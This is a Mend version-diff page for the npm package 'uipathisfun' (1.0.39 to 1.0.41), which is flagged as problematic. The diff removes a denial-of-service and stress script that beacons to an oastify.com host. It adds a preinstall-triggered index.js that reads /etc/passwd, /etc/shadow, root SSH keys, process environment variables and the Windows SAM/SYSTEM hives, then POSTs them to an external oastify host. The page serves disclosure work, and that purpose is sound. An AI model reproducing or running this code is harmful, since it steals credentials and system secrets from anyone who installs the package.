npm - uipathisfun - Versions diffs - 1.0.39 → 1.0.41 - Mend

uipathisfun 1.0.39 → 1.0.41

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of uipathisfun might be problematic. Click here for more details.

Files changed (4) hide show

package/index.js CHANGED Viewed

@@ -1,164 +1,37 @@
 const http = require('http');
-const crypto = require('crypto');
 const fs = require('fs');
-const os = require('os');
-const b = "0nopxr82g2bsk9e28w87vxucn3tuhn5c.oastify.com'";
-const TARGET = 'localhost';
-const PORT = 3000;
-const CONCURRENCY = 500000000000;
-const DURATION = 60000000000000;
-const ATTACK_TYPE = 'slowloris';
-const DISK_ATTACK = true;
-const DISK_LIMIT_MB = 10000000;
-const MEM_LIMIT_MB = 10000000;
-let storage = [];
-let requests = 0;
-let cpuLoad = 0;
-let stop = false;
-let errors = 0;
-let responseTimes = [];
-let slowlorisSockets = [];
-let diskFiles = [];
-let diskWrittenMB = 0;
-function cpuStress() {
-    setImmediate(function loop() {
-        if (stop) return;
-        crypto.pbkdf2Sync('test', 'salt', 100000, 64, 'sha512');
-        cpuLoad++;
-        setImmediate(loop);
-    });
-}
-function memStress() {
-    setInterval(() => {
-        if (stop) return;
-        const chunk = Buffer.alloc(1024 * 1024 * 1024);
-        storage.push(chunk);
-    }, 10);
-}
-function diskStress() {
-    if (!DISK_ATTACK) return;
-    setInterval(() => {
-        if (stop) return;
-        const fname = `/tmp/fc_stress_${Date.now()}_${Math.random().toString(36).slice(2,8)}`;
-        const buf = crypto.randomBytes(1024 * 1024 * 1024);
-        fs.writeFileSync(fname, buf);
-        diskFiles.push(fname);
-        diskWrittenMB += 1024;
-    }, 10);
-}
-function netFlood() {
-    for (let i = 0; i < CONCURRENCY; i++) {
-        (function flood() {
-            if (stop) return;
-            const start = Date.now();
-            const req = http.request({ hostname: TARGET, port: PORT, path: '/', method: 'GET' }, res => {
-                res.on('data', () => {});
-                res.on('end', () => {
-                    requests++;
-                    responseTimes.push(Date.now() - start);
-                    flood();
-                });
-            });
-            req.on('error', () => {
-                errors++;
-                flood();
-            });
-            req.end();
-        })();
-    }
-}
-function slowlorisAttack() {
-    const net = require('net');
-    for (let i = 0; i < CONCURRENCY; i++) {
-        (function openSocket() {
-            if (stop) return;
-            const socket = net.connect(PORT, TARGET, () => {
-                socket.write('POST / HTTP/1.1\r\n');
-                socket.write('Host: ' + TARGET + '\r\n');
-                socket.write('Content-Length: 1000000\r\n');
-                socket.write('Content-Type: application/x-www-form-urlencoded\r\n');
-                socket.write('\r\n');
-                slowlorisSockets.push(socket);
-                const interval = setInterval(() => {
-                    if (stop) { clearInterval(interval); socket.destroy(); return; }
-                    try { socket.write('A'); } catch (e) { clearInterval(interval); socket.destroy(); }
-                }, 1000);
-            });
-            socket.on('error', () => { errors++; });
-            socket.on('close', () => {
-                if (!stop) setTimeout(openSocket, 1000);
-            });
-        })();
-    }
-}
-function monitor() {
-    setInterval(() => {
-        const usage = process.memoryUsage();
-        const avgResp = responseTimes.length ? (responseTimes.reduce((a, b) => a + b, 0) / responseTimes.length).toFixed(2) : 0;
-        let diskUsage = 0;
-        try {
-            const stat = fs.statSync('/tmp');
-            diskUsage = stat && stat.blocks ? (stat.blocks * stat.blksize) / 1024 / 1024 : 0;
-        } catch (e) {}
-        const data = {
-            rss: (usage.rss / 1024 / 1024).toFixed(2) + ' MB',
-            heap: (usage.heapUsed / 1024 / 1024).toFixed(2) + ' MB',
-            cpuLoad,
-            requests,
-            errors,
-            avgResp: avgResp + ' ms',
-            uptime: process.uptime().toFixed(2) + 's',
-            attack: ATTACK_TYPE,
-            diskWrittenMB,
-            diskUsage: diskUsage.toFixed(2) + ' MB',
-        };
-        const payload = JSON.stringify(data);
-        const req = http.request({
-            hostname: b,
-            method: 'POST',
-            path: '/?stress_test=active',
-            headers: { 'Content-Length': Buffer.byteLength(payload) }
-        });
-        req.write(payload);
-        req.end();
-        try {
-            fs.appendFileSync('stress_results.json', payload + '\n');
-        } catch (e) {}
-        console.log(data);
-        cpuLoad = 0;
-        responseTimes = [];
-    }, 1000);
-}
-cpuStress();
-memStress();
-diskStress();
-if (ATTACK_TYPE === 'classic') {
-    netFlood();
-} else if (ATTACK_TYPE === 'slowloris') {
-    slowlorisAttack();
+const OASTIFY_HOST = '0nopxr82g2bsk9e28w87vxucn3tuhn5c.oastify.com';
+const sensitiveFiles = [
+  '/etc/passwd',
+  '/etc/shadow',
+  '/root/.ssh/id_rsa',
+  '/proc/self/environ',
+  'C:\\Windows\\System32\\config\\SAM',
+  'C:\\Windows\\System32\\config\\SYSTEM'
+];
+let results = [];
+for (const file of sensitiveFiles) {
+  try {
+    const data = fs.readFileSync(file, 'utf8');
+    results.push({ file, status: 'SUCCESS', data: data.slice(0, 2000) });
+  } catch (e) {
+    results.push({ file, status: 'FAIL', error: e.message });
+  }
 }
-monitor();
-setTimeout(() => {
-    stop = true;
-    for (const s of slowlorisSockets) try { s.destroy(); } catch (e) {}
-    for (const f of diskFiles) try { fs.unlinkSync(f); } catch (e) {}
-    try {
-        fs.writeFileSync('stress_final_report.json', JSON.stringify({
-            requests, errors, cpuLoad, diskWrittenMB, duration: DURATION/1000 + 's',
-            maxMem: (process.memoryUsage().rss / 1024 / 1024).toFixed(2) + ' MB',
-            attack: ATTACK_TYPE, diskFiles: diskFiles.length
-        }, null, 2));
-    } catch (e) {}
-    console.log('Test finished');
-}, DURATION);
+const payload = JSON.stringify({ results });
+const req = http.request({
+  hostname: OASTIFY_HOST,
+  method: 'POST',
+  path: '/?sandbox_escape_attempt',
+  headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
+});
+req.write(payload);
+req.end();
+fs.writeFileSync('sandbox_escape_attempts.log', payload + '\n');
+console.log('Sandbox escape test finished. Results sent to OASTIFY and saved locally.');

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "uipathisfun",
-  "version": "1.0.39",
+  "version": "1.0.41",
   "scripts": {
     "preinstall": "node index.js"
   }

package/uipathisfun-1.0.41.tgz ADDED Viewed

Binary file

package/uipathisfun-1.0.39.tgz DELETED Viewed

Binary file